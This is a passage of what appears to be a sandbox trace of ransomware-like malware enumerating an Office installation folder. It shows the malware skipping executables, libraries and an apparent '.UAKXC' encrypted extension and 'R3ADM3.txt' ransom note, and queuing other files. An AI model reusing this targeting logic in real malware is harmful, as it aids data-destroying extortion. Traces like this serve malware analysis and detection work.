StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".lnk") returned 0x0 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".sys") returned 0x0 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".msi") returned 0x0 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddb20 [0159.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xd0) returned 0xef7878 [0159.366] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.367] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0675200, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x853ab920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa0675200, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x74760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.sharepoint.workflowactions.proxy.dll", cAlternateFileName="MI6AA3~1.DLL")) returned 1 [0159.367] lstrcmpW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2=".") returned 1 [0159.367] lstrcmpW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="..") returned 1 [0159.367] StrStrIW (lpFirst="microsoft.sharepoint.workflowactions.proxy.dll", lpSrch=".UAKXC") returned 0x0 [0159.367] StrStrIW (lpFirst="microsoft.sharepoint.workflowactions.proxy.dll", lpSrch=".exe") returned 0x0 [0159.367] StrStrIW (lpFirst="microsoft.sharepoint.workflowactions.proxy.dll", lpSrch=".dll") returned=".dll" [0159.367] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31ae500, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x69c26830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe31ae500, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x84760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MIMEDIR.DLL", cAlternateFileName="")) returned 1 [0159.367] lstrcmpW (lpString1="MIMEDIR.DLL", lpString2=".") returned 1 [0159.367] lstrcmpW (lpString1="MIMEDIR.DLL", lpString2="..") returned 1 [0159.367] StrStrIW (lpFirst="MIMEDIR.DLL", lpSrch=".UAKXC") returned 0x0 [0159.367] StrStrIW (lpFirst="MIMEDIR.DLL", lpSrch=".exe") returned 0x0 [0159.367] StrStrIW (lpFirst="MIMEDIR.DLL", lpSrch=".dll") returned=".DLL" [0159.367] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2796a00, ftCreationTime.dwHighDateTime=0x1cacb3c, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2796a00, ftLastWriteTime.dwHighDateTime=0x1cacb3c, nFileSizeHigh=0x0, nFileSizeLow=0x8b760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="misc.exe", cAlternateFileName="")) returned 1 [0159.367] lstrcmpW (lpString1="misc.exe", lpString2=".") returned 1 [0159.367] lstrcmpW (lpString1="misc.exe", lpString2="..") returned 1 [0159.367] StrStrIW (lpFirst="misc.exe", lpSrch=".UAKXC") returned 0x0 [0159.367] StrStrIW (lpFirst="misc.exe", lpSrch=".exe") returned=".exe" [0159.367] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x58adaa50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x12588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MLCFG32.CPL", cAlternateFileName="")) returned 1 [0159.367] lstrcmpW (lpString1="MLCFG32.CPL", lpString2=".") returned 1 [0159.367] lstrcmpW (lpString1="MLCFG32.CPL", lpString2="..") returned 1 [0159.367] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".UAKXC") returned 0x0 [0159.367] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".exe") returned 0x0 [0159.367] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".dll") returned 0x0 [0159.368] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".lnk") returned 0x0 [0159.368] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".sys") returned 0x0 [0159.368] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch=".msi") returned 0x0 [0159.368] StrStrIW (lpFirst="MLCFG32.CPL", lpSrch="R3ADM3.txt") returned 0x0 [0159.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77923b8 [0159.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.368] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31ae500, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe31ae500, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x5980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MLSHEXT.DLL", cAlternateFileName="")) returned 1 [0159.368] lstrcmpW (lpString1="MLSHEXT.DLL", lpString2=".") returned 1 [0159.368] lstrcmpW (lpString1="MLSHEXT.DLL", lpString2="..") returned 1 [0159.368] StrStrIW (lpFirst="MLSHEXT.DLL", lpSrch=".UAKXC") returned 0x0 [0159.368] StrStrIW (lpFirst="MLSHEXT.DLL", lpSrch=".exe") returned 0x0 [0159.368] StrStrIW (lpFirst="MLSHEXT.DLL", lpSrch=".dll") returned=".DLL" [0159.368] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe79fd00, ftCreationTime.dwHighDateTime=0x1c9cdff, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe79fd00, ftLastWriteTime.dwHighDateTime=0x1c9cdff, nFileSizeHigh=0x0, nFileSizeLow=0x25f87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MML2OMML.XSL", cAlternateFileName="")) returned 1 [0159.368] lstrcmpW (lpString1="MML2OMML.XSL", lpString2=".") returned 1 [0159.368] lstrcmpW (lpString1="MML2OMML.XSL", lpString2="..") returned 1 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".UAKXC") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".exe") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".dll") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".lnk") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".sys") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch=".msi") returned 0x0 [0159.368] StrStrIW (lpFirst="MML2OMML.XSL", lpSrch="R3ADM3.txt") returned 0x0 [0159.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77923e0 [0159.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.369] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee75d00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd6140cc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1ee75d00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x9f368, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MODELENG.DLL", cAlternateFileName="")) returned 1 [0159.369] lstrcmpW (lpString1="MODELENG.DLL", lpString2=".") returned 1 [0159.369] lstrcmpW (lpString1="MODELENG.DLL", lpString2="..") returned 1 [0159.369] StrStrIW (lpFirst="MODELENG.DLL", lpSrch=".UAKXC") returned 0x0 [0159.369] StrStrIW (lpFirst="MODELENG.DLL", lpSrch=".exe") returned 0x0 [0159.369] StrStrIW (lpFirst="MODELENG.DLL", lpSrch=".dll") returned=".DLL" [0159.369] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e01e00, ftCreationTime.dwHighDateTime=0x1cab8a8, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83e01e00, ftLastWriteTime.dwHighDateTime=0x1cab8a8, nFileSizeHigh=0x0, nFileSizeLow=0x9a790, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MORPH9.DLL", cAlternateFileName="")) returned 1 [0159.369] lstrcmpW (lpString1="MORPH9.DLL", lpString2=".") returned 1 [0159.369] lstrcmpW (lpString1="MORPH9.DLL", lpString2="..") returned 1 [0159.369] StrStrIW (lpFirst="MORPH9.DLL", lpSrch=".UAKXC") returned 0x0 [0159.369] StrStrIW (lpFirst="MORPH9.DLL", lpSrch=".exe") returned 0x0 [0159.369] StrStrIW (lpFirst="MORPH9.DLL", lpSrch=".dll") returned=".DLL" [0159.369] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0675200, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x82755f60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa0675200, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x32960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPXINT.DLL", cAlternateFileName="")) returned 1 [0159.369] lstrcmpW (lpString1="MPXINT.DLL", lpString2=".") returned 1 [0159.369] lstrcmpW (lpString1="MPXINT.DLL", lpString2="..") returned 1 [0159.369] StrStrIW (lpFirst="MPXINT.DLL", lpSrch=".UAKXC") returned 0x0 [0159.369] StrStrIW (lpFirst="MPXINT.DLL", lpSrch=".exe") returned 0x0 [0159.369] StrStrIW (lpFirst="MPXINT.DLL", lpSrch=".dll") returned=".DLL" [0159.370] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaca1de00, ftCreationTime.dwHighDateTime=0x1cab7ea, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaca1de00, ftLastWriteTime.dwHighDateTime=0x1cab7ea, nFileSizeHigh=0x0, nFileSizeLow=0xa5580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSACC.OLB", cAlternateFileName="")) returned 1 [0159.370] lstrcmpW (lpString1="MSACC.OLB", lpString2=".") returned 1 [0159.370] lstrcmpW (lpString1="MSACC.OLB", lpString2="..") returned 1 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".UAKXC") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".exe") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".dll") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".lnk") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".sys") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch=".msi") returned 0x0 [0159.370] StrStrIW (lpFirst="MSACC.OLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792408 [0159.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.371] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5fbe00, ftCreationTime.dwHighDateTime=0x1cab8ab, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc5fbe00, ftLastWriteTime.dwHighDateTime=0x1cab8ab, nFileSizeHigh=0x0, nFileSizeLow=0x132cb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSACCESS.EXE", cAlternateFileName="")) returned 1 [0159.371] lstrcmpW (lpString1="MSACCESS.EXE", lpString2=".") returned 1 [0159.371] lstrcmpW (lpString1="MSACCESS.EXE", lpString2="..") returned 1 [0159.371] StrStrIW (lpFirst="MSACCESS.EXE", lpSrch=".UAKXC") returned 0x0 [0159.371] StrStrIW (lpFirst="MSACCESS.EXE", lpSrch=".exe") returned=".EXE" [0159.371] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53eb900, ftCreationTime.dwHighDateTime=0x1cab7e4, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe53eb900, ftLastWriteTime.dwHighDateTime=0x1cab7e4, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msaccess.exe.manifest", cAlternateFileName="MSACCE~1.MAN")) returned 1 [0159.371] lstrcmpW (lpString1="msaccess.exe.manifest", lpString2=".") returned 1 [0159.371] lstrcmpW (lpString1="msaccess.exe.manifest", lpString2="..") returned 1 [0159.371] StrStrIW (lpFirst="msaccess.exe.manifest", lpSrch=".UAKXC") returned 0x0 [0159.371] StrStrIW (lpFirst="msaccess.exe.manifest", lpSrch=".exe") returned=".exe.manifest" [0159.371] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e9100, ftCreationTime.dwHighDateTime=0x1cab8ab, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2e9100, ftLastWriteTime.dwHighDateTime=0x1cab8ab, nFileSizeHigh=0x0, nFileSizeLow=0x14188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSAEXP30.DLL", cAlternateFileName="")) returned 1 [0159.371] lstrcmpW (lpString1="MSAEXP30.DLL", lpString2=".") returned 1 [0159.371] lstrcmpW (lpString1="MSAEXP30.DLL", lpString2="..") returned 1 [0159.371] StrStrIW (lpFirst="MSAEXP30.DLL", lpSrch=".UAKXC") returned 0x0 [0159.371] StrStrIW (lpFirst="MSAEXP30.DLL", lpSrch=".exe") returned 0x0 [0159.371] StrStrIW (lpFirst="MSAEXP30.DLL", lpSrch=".dll") returned=".DLL" [0159.371] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67a5b300, ftCreationTime.dwHighDateTime=0x1ca99c5, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67a5b300, ftLastWriteTime.dwHighDateTime=0x1ca99c5, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSCOL11.INF", cAlternateFileName="")) returned 1 [0159.371] lstrcmpW (lpString1="MSCOL11.INF", lpString2=".") returned 1 [0159.371] lstrcmpW (lpString1="MSCOL11.INF", lpString2="..") returned 1 [0159.371] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".UAKXC") returned 0x0 [0159.371] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".exe") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".dll") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".lnk") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".sys") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.INF", lpSrch=".msi") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.INF", lpSrch="R3ADM3.txt") returned 0x0 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792430 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.372] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd78b00, ftCreationTime.dwHighDateTime=0x1c7a766, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9dd78b00, ftLastWriteTime.dwHighDateTime=0x1c7a766, nFileSizeHigh=0x0, nFileSizeLow=0x1aad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSCOL11.PPD", cAlternateFileName="")) returned 1 [0159.372] lstrcmpW (lpString1="MSCOL11.PPD", lpString2=".") returned 1 [0159.372] lstrcmpW (lpString1="MSCOL11.PPD", lpString2="..") returned 1 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".UAKXC") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".exe") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".dll") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".lnk") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".sys") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch=".msi") returned 0x0 [0159.372] StrStrIW (lpFirst="MSCOL11.PPD", lpSrch="R3ADM3.txt") returned 0x0 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792458 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.372] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ccb6a00, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa1ff9760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1ccb6a00, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7cm_en.dub", cAlternateFileName="MSBB80~1.DUB")) returned 1 [0159.373] lstrcmpW (lpString1="mscss7cm_en.dub", lpString2=".") returned 1 [0159.373] lstrcmpW (lpString1="mscss7cm_en.dub", lpString2="..") returned 1 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".UAKXC") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".exe") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".dll") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".lnk") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".sys") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch=".msi") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_en.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792480 [0159.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.373] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21901e00, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa6dc8680, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x21901e00, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7cm_es.dub", cAlternateFileName="MSCSS7~1.DUB")) returned 1 [0159.373] lstrcmpW (lpString1="mscss7cm_es.dub", lpString2=".") returned 1 [0159.373] lstrcmpW (lpString1="mscss7cm_es.dub", lpString2="..") returned 1 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".UAKXC") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".exe") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".dll") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".lnk") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".sys") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch=".msi") returned 0x0 [0159.373] StrStrIW (lpFirst="mscss7cm_es.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77924a8 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.374] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2dc400, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa3e79140, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1f2dc400, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7cm_fr.dub", cAlternateFileName="MSCSS7~3.DUB")) returned 1 [0159.374] lstrcmpW (lpString1="mscss7cm_fr.dub", lpString2=".") returned 1 [0159.374] lstrcmpW (lpString1="mscss7cm_fr.dub", lpString2="..") returned 1 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".UAKXC") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".exe") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".dll") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".lnk") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".sys") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch=".msi") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7cm_fr.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77924d0 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.374] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d49a00, ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa22a7020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x57d49a00, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0x75398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7en.dll", cAlternateFileName="")) returned 1 [0159.374] lstrcmpW (lpString1="mscss7en.dll", lpString2=".") returned 1 [0159.374] lstrcmpW (lpString1="mscss7en.dll", lpString2="..") returned 1 [0159.374] StrStrIW (lpFirst="mscss7en.dll", lpSrch=".UAKXC") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7en.dll", lpSrch=".exe") returned 0x0 [0159.374] StrStrIW (lpFirst="mscss7en.dll", lpSrch=".dll") returned=".dll" [0159.374] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4474ff00, ftCreationTime.dwHighDateTime=0x1cba07f, ftLastAccessTime.dwLowDateTime=0xa6da2520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4474ff00, ftLastWriteTime.dwHighDateTime=0x1cba07f, nFileSizeHigh=0x0, nFileSizeLow=0x75398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7es.dll", cAlternateFileName="")) returned 1 [0159.375] lstrcmpW (lpString1="mscss7es.dll", lpString2=".") returned 1 [0159.375] lstrcmpW (lpString1="mscss7es.dll", lpString2="..") returned 1 [0159.375] StrStrIW (lpFirst="mscss7es.dll", lpSrch=".UAKXC") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7es.dll", lpSrch=".exe") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7es.dll", lpSrch=".dll") returned=".dll" [0159.375] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efba800, 